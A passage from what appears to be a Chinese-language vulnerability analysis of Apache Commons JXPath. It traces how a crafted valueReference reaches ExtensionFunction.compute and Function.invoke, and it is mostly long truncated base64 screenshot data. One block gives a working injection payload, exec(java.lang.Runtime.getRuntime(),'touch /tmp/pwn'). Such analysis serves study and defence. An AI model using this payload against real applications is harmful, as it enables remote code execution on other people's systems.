lBp2lwICTNzlUVVtf4P/jv4fFZKfAlYg6ErWOupZSdUiLfWqXJ8OrPXhoLR0qQrLWjeDfDsIEQz5krHgDYo6uApMMGYjO+egJW8Ett4K2jz0e7NVUMtJ44uqS/hTcdYjxheAU2+h+PmBvDx560R++Fb839xm9ytj6uUR83GBd6dhusNurvb2SI8dTPEzxAMJ48+mzz7Ea+rFMjZLC5eRAA6moOw3zDhvwHv9LIENr+b//3aDSindK8+npoXoExA1pTZODNkx2Nhyrv3V//m+ebF3+8SqOldIN+xxKpVAQw5nLCSpd/tVJmS0V8gFGHIzTzNQFK09ODQP3X2jouja7ot8HHAQmNma6NrXcpVsbHtNWx5WIBhM3OWbVMKcksrckXBk0XP+gyjVMK1vC+HfmZ2dns4cHw7BQkAKOjY3QpLY4l31aSL/AP/KXPEY6WP3FrR7Os6bBhz/6GIwXmo6+b6/ZW1MoJpZ7zF1t/2OQBAEqFj37xk5+VmY8ebT1DCABsqr/jX2qE537/uxnzEBRbfvFwYQ6ZcWxK8VFMADB84c9/O/NASoWP3le9s0AQ2Wf4ev9bLVfOJIh0WqCpSFwAgIZn/r0h+nJWCNOThw9XReMuWk+98Gykr0Zp/ZO/PlxFSOSmr/HATw5VMgBgbP+3l46eHSBkagcAMJpM5riAjSXk+/ILzzYvLN/kp0zVf1f+1YP82G6+Dx/sisXz8PedKNudH91v95s7d8Pcfah6f/HDP1AoCQBQ65nh15+MdM0p3V/84x8oCKFUP/zcvf67f6cryQcAX88/9B877iNkagcA8Fn1/j99s699BfKdi5DLjp4Bze58XjaAcZ5j+19/0h47NkltAIDi0a6irR/2P6eXP3xQoSSU6h2/iRZ7VesKAPiVf5dz5x6FMn+qMPY3tk3Nu8jXqCk1tZ8fWNT3ZSTQiOl44f95rmnqzbqvvvKlCnPkqUWSFpsi5Vh0ystxLZCQwea4Tmei9hwrQ9vL3zNVH26sYgilpvaXolkv7xOa98CPvt+gMk89k4mvgYWknOqs8x448pXKClUkdsvY/ruT7/5m6qQ29Pk2XWg7VFmt0mgBFhUlZTCZoVLFqAFWb1YDpYSn1BVuypVLhRlpMDnudgxe6rlqCUYHqxxpfmlRgVoq5LIm/aOmKz2dei9ENmVt2/sJjevSebN4s44RcSHgMva3tZl8lNI0bd19JcroBZKV7ttbGslrYqj5eM9I5PA0ibakUJsjE6enhYNu2/UrnT3OIAEAyivceVe5dPzG+Q/anGFCaZr8tj3bCzKc3R9e7Pfm1X8mecoRHGVFTWUe29jyly7LIjp5IrGABT7HyAQhM14DAFGIxUBtznlv9SYpc+u1sTAot+39hMb1UcuQoHhzrpTPCnntg90X+q3jAADMjru3a9
<p blockindex=45>这个会根据刚刚编译返回的对象跳转到对应的compute方法</p>
<p blockindex=46>因为传入的<code>valueReference=sssss</code>,会跳转到<code>org.apache.commons.jxpath.ri.compiler.LocationPath</code>的compute方法</p>
<p blockindex=47><img src=data:image/png;base64,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
<p blockindex=48>如果传入的<code>valueReference=exec(java.lang.Runtime.getRuntime(),'touch /tmp/pwn')</code> payload来源为<a href=https://tttang.com/archive/1771/>https://tttang.com/archive/1771/</a></p>
<p blockindex=49>则跳转到<code>org.apache.commons.jxpath.ri.compiler.ExtensionFunction的compute</code></p>
<p blockindex=50><img src="data:image/png;base64,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
<p blockindex=51>继续跟进来到computeValue</p>
<p blockindex=52><img src=data:image/png;base64,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
<p blockindex=53>这里获得了org.apache.commons.jxpath.Function对应的这个实例后回去调用具体的invoke的实现</p>
<p blockindex=54>运行结果</p>
<p blockindex=55><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA+cAAADbCAIAAACAzHegAAAgAElEQVR4nOydd1wUV9fHz8x2qtK7gBpNseZNMTEqICu9KAIKCrFiVyyxBkvECrHlscUuQqygYokl0dgToz4+dkBBLIC41F22zbx/jKzLlmEXgV30fj/70d2zd849c5l75zd3z9zBPNt1Bi1069rJ19fH26vXiZOn16zdQBCEtpINw87Otn94kI+P17BhYyqrqnXcCscxNpvNYDCoj717fbNs6SKVMvPmLTp15k9li1wul0gkBEHqWF6BvuWNDR6Pe+6P4/0jYgoLnwNAly6fbd64tq9vcEVllaFDaxK0/b0uXLryQbVDA2hYf2wxYO9xbR8uLX18RjSY5MVJubl5W7buMhI/CMS7Q5IkSZL0ZTAa1d6P72NqavLnuQuvXwsaOzYAAL9+fTt2/Gjb9rTy8nJ9t8VxjMlkMhgMHMdpihEEIZfLZTIZQdTTEO8xEQNCv4+PYbHYcjlRVFy0ceO2y1euGTooA4DagZ56+qO6DjVsl9I3HqTaEYj3iKAgv+fPnv97479G4geBeEd0kexAr9pbBBgGGIZhGI7jb06UZB0MGx0C8b6AVLs+INWOQCAQCF3QS60ymzSUZoAkgSRJALlcbuhQEIj3GOO/AFZRys0YsKJm428kBAKBQBgP+k4w06WXIFo0vXt9Y2pqYugoEIimgaz7Uger+0IgEAgEwmggSSBIQt+cEONV7Yr7TY0c9zZu6Wlb/ziTnX1k38cfd6ApGRXZn8/3bp6oHBzsFsyfa8A29PBwzz6yN/vIvls3LtnYWLc4/wiE7tBcOyAQCAQCoQJJkiRJNOC00UwZMu3bteX7ev+yfrPCwuWyo6MGBvjz3dxcpFLZP9f//XnVLwUFhYoCs2YmPnjwcN/+LIWFz/dOGDXc3t6urEywfuPWo0dPKL768ovPpyZOsLa2Kil5NX7itNLS1wCwcMGcnt/2qK2Oe/fu/RGjxgMAm82aPnVijx5fyeTy+/cfLlmSUl5RQfmPGxpjbdVaKpVt2bozM+uoLrv2y7qU1WvX//77WSur1pWVlTR+unTplJubp+4Bw7CJExLCQoMIgjh2/PfUn9dR117a4teF4cOG7tt3qKKikvqo3v4NIzQk8JNPOixZmjpqZDxJwuZft2sr+fjxk8DgSA6Hfe1Kkyzm0NT+EQgEAoFAIBqdd7ntsplUu6urc+8+PZVV4/hxCTiO/zArqaDgKZvNGjwocvPGtWH9o0UiMQBYmJv5+/GVRSGXy/bq02vWnPkPH+Z07fLZpo1r79y5//jxEwDwcG+zdMmCxGmzbt68bWXVWrHizY9JixWbL0mef+/eA+p9wujhFpaWoeHRALBw/txJk8YsXLQMAFxdnOfOXfj4Sb6np/vunb/m5uXdvn2Xfr9MTU1cXJyvXPkbABT16usnIIDv49Onf0RMTU3NyeOHcnLysg5n08QPABiGpaxcjGNY4rQ56ity2tvb8n19gkMjadq/Ybi5uTzOywcANzfXc3/+9Y7eEIj3EpSPg0AgEAh13n2ZFDrVPmpkfMzgqE2btzGZzPDwYA/3Nt9+17eqSshms6ZNneDj7SWVSi9eurIyZTUltbXZ03ZvcbC3s7S0yD6yFwDGjkvMLyhcmbJGUZFIJN+yded33/UICw1Oz9gPAOHhIVeuXCsqKlGUqamRzJo9n3p/4+btZ89ftGvnSan2mJjIzKzsmzdvg5J0VsbR0b7ntz2Sk1dQHz093P+9cUsuJwDgxs1bvXr1pOyKFVvz8p7k5ua5ubpSarvntz0Sp4y3tLQgCGL/gUMbN729lmBQ607W/Rto8wMA1tbWG/6z6uOPOzwtfDZ3zoInBU8BIDQkMC0tQyA